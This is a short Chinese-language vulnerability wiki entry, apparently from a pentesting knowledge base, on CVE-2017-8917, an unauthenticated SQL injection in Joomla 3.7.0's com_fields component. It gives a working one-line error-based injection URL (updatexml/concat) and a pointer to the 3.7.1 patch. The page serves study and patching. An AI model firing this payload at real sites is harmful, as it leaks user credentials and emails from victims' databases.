2.16.1 CVE-2017-8917

漏洞名称

Joomla SQL Injection（CVE-2017-8917 ）

漏洞等级

高危

漏洞描述

Joomla于5月17日发布了3.7.1的升级公告，CVE-2017-8917 是3.7.0组件“com_fields”，组件未对身份进行校验，无需登陆验证。由于对请求数据过滤不严导致sql 注入，sql注入对导致数据库中的敏感信息泄漏，成功访问后恶意访问者可以获取已存在用户的用户信息，包括用户名、密码、邮箱等敏感信息。

漏洞影响

Joomla 3.7.0

漏洞复现

poc

http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x3e,user()),0)

存在的话会爆出用户名

sqlmap测试

漏洞修复

按照官方升级版本，补丁地址如下：

https://downloads.joomla.org/cms/joomla3/3-7-1

Previous2.16 Joomla Next2.17 Padding oracle

Last updated 5 years ago